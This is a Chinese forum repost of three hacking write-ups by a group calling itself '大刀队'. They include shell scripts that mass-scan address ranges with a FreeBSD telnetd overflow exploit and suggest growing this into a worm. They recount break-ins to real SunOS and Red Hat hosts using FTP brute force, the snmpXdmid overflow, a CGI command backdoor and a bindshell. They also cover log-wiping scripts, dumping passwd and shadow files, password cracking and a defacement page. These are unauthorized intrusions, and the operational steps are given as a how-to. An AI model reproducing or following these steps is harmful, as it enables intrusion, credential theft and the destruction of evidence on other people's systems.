发信人: qwhw(卧栏听雨)
整理人: starseacn(2002-03-05 08:50:59), 站内信件
|
以下是我的第一套方法.(不太现实,第二套方法改进后效果提高几十倍)
第一种:
今天我扫到一台freebsd3.1机器,就上了一台freebsd的跳板。
没想到它的漏洞补起来了,我就想能能扫它个网段呢。
于是我就开始行动了。我想利用溢出程序的-c参数。
首先自己要生成c类或b类地址啊,我就想到用unix shell 语言来实现。
由于自己正在学,所以不太熟悉,我就一边网上找找教材(网吧上的),
一边写程序。
1。首先成个0到255的文本文件。num.c
main()
{
int i=0;
for(i=0;i<256;i++)
printf("%d\n",i);
}
2。生成c类地址代码。ipc
#!/bin/sh
echo -n "please ernter a ip:"
read ipip
list=`cat num.txt`
for listip in $list
do
echo $ipip.$listip
done
运行是输入如202.102.1即可。
3。生成b类地址代码。ipb
#!/bin/sh
echo -n "please ernter a ip:"
read ipip
list0=`cat num.txt`
for listip0 in $list0
do
list=`cat num.txt`
for listip in $list
do
echo $ipip.$listip0.$listip
done
done
4.a类的只要再套个循环即可。
编译:
gcc -o num num.c
./num >num.txt
以后要生成c类或b类地址的话就只要运行上面的shell程序重定向到文本文件中即可
以上程序均调试成功
5。我想利用溢出程序的-c参数进行扫描。scan
#!/bin/sh
list=`cat iplist.txt`
for listip in $list
do
./freebsdtelnetd -c $listip
done
iplist.txt为生成的地址。
./scan >>freebsd.log
第二种:
先用天行的nethacker扫23 端口生成的ip地址列表ip.txt
把主机分离出来
#!/bin/sh
#iplist
cat ip.txt|awk '{print $1}'
^d
大刀队%chmod u+x iplist
大刀队%./iplist >iplist.txt
#!/bin/sh
#scan
list=`cat iplist.txt`
for mmm in $list
do
echo "scan $mmm ....."
./freebsd -c $mmm >>a.log
done
大刀队%chmod u+x scan
大刀队%nohup ./scan &
大刀队%at now + 5 hours
>mail [email protected] <nohup.out
^d
哈哈,五小时后收报告吧!不要扫描的太多哦!多了给我几个!嘿嘿!-^-
以上第二种方法切实可行,我扫到几十台.
注意:程序不完善,有时出现死进程,不过可以解决.
自己在编个shell脚本
原理如下:
对freescan进程进行采样:
sleep 30
30秒后再对进程进行采样,
如果两次进程号相同,就kill -9
杀了
进一步改进,找个freebsd系统下端口的扫描器,扫描23
生成报告,再发展下去复杂点就可以写成蠕虫了哦!
————————————————————————————————————————
————
sunos下入侵的一点方法!
来源:大刀队
由于昨天没把telnet的log记录下来,所以今天只好讲讲我的方法,思路。
昨玩我在网吧玩通宵,觉得没尽,就随便到www.google.com上找了一个日本网站用supersca
n扫描这网站的c类地址的23,79端口。
还好,扫描到不少。
随便telnet一个,23,79多开的端口。
一看,是台suns5。7的系统,还开了79端口,觉得有戏。
赶快telnet ip 79 ,finger 0看看
好家伙,有几个用户名,看来有戏唱了。
单独扫一下这ip的端口,21也开了,看来我要拿出我最拿手的猜解密码的本事了,
我于是手工试了一个密码,大多是123456 ,000000 用户名之类的。
失败,看来要用工具猜解了,赶快到我的email工具箱里拿出天行的nethacker
和一本万能之典,生成了一个密码档,当然密码档不能太大,简单的常用单词和简单数字即
可。拿起nethacker就尝试ftp破解,,我就先到中国游戏中心下军旗去了,下了一盘,回来看
看好了没有。
结果令我大失所望,一个也没探到。不能就此罢手哦,sunos的rpc远程溢出很有名的哦
省得麻烦了,拿出流光,探测rpc漏洞服务。
有个snmpXdmid远程溢出漏洞。
这下好办事了,
赶快telnet 我的跳板 (freebsd 4.3的系统)
login:dadao
pass;******
bash-2.05%cd /隐藏目录
bash-2.05%./mine (一个设置euid位的shell)
#cls (擦日志)
#cat ./cls
/隐藏目录/wipe u `logname`
/隐藏目录/wipe w `logname`
/隐藏目录/wipe l `logname`
rm -f /home/用户名/.bash_history
rm -f /home/用户名/.history
#w (看有人没)
#cat >snmpXdmid.c <<_eof_
.......
......
....... (程序)
_eof_
#gcc -o snmpXdmid snmpXdmid.c
#./snmpXdmid ip -v 7
等了十几秒钟,溢出成功,(注意,这溢出只能用一次)
i get a root shell
id
root uid=0 (溢出成功,root),马上 打开记录telnet的log
cat /etc/passwd
......
.......
......
......
cat /etc/shadow
.......
.......
......
......
find / -name hodocs (从根目录开始找主页位置)
过了一会儿,找到了。
cd /目录
现在就在自己机器上做了个黑页,把主页也替换了吧,
于是自己打开记事本,编了个黑页
以下开始替换主页
cat >index.html <<_eof_
<html><center>
历史不容忘却<br><br><br><br>
hacked by 大刀队</center>
</html>
_eof_ /*注意这里有细节问题,在这种远程溢出中,使用cat不能
用ctrl^d 要用<<_eof_ 不然你会ctrl^d后就会回到
你的跳板上. */
因为我的sunos跳板比较多,所以也就不打算留什么后门,
于是就
rm -rf /usr/adm (删除日志文件)
————————————————————————————————————————
—————————————————————————————————————————
—————————
redhat没开23,拿到root权限
来源:大刀队
以前我就弄到过一个国内主机的普通用户密码,无奈我那是水平太菜,也不会搞,
今天心情一好,上去试试看能不能拿到root,鉴于是一家服务提供商,暂时不公布它的
域名。希望理解。
开始咯。
我ftp上去瞧瞧!dir 看看,发现有cgi-bin目录,
嘿嘿,有好戏看咯,各位别急,听我慢慢道来。
既然有cgi程序,我先下个cgi程序下来看看,是pl编的
那我上传个pl程序后门不就得了,说办就办,马上到我的
email工具箱里拿出cgi(pl)后门程序,我靠,你的工具箱里
怎么什么多有,那当然,东西多干活快吗,嘿嘿,。
程序(cmd.pl)是传上去了,可是文件属性是rwx------
我靠,怎么办,没有telnet好改文件属性吗,当然好咯。
quote site chmod 777 cmd.pl
www.xxx.com/cgi-bin/cmd.pl?ls -la
哈哈,文件列了出来
www.xxx.com/cgi-bin/cmd.pl?id
看看,没什么好看的,是nobody。
赶快传个bindshell.c上去,好办事啊
接下来用ftp传了个bindshell.c上去
www.xxx.com/cgi-bin/cmd.pl?gcc -o bind bindshell.c
我靠!
NND,一堆警告,仔细一看,原来我nobody在cgi-bin目录
下没有写权限,生成不了可执行文件,
赶快修改目录属性吧,在ftp 下quote site chmod 777 cgi-bin
再来
www.xxx.com/cgi-bin/cmd.pl?gcc -o bind bindshell.c
这下好了,bind 有了,在浏览器上激活bind
www.xxx.com/cgi-bin/cmd.pl?/home/xxx/cgi-bin/bind
nc连看看
c:\nc www.xxx.com 31377
接下来不要我说了吧,uname -a看版本,找本地溢出。
拿到root,抓shadow,passwd
还有好百把个用户呢,反正我用john的single
解到不少密码,我看了httpd.conf文件,
有 不少家公司在上面。
给网管写信,没见踪影??????????
中国管理员怎么回事啊
|
|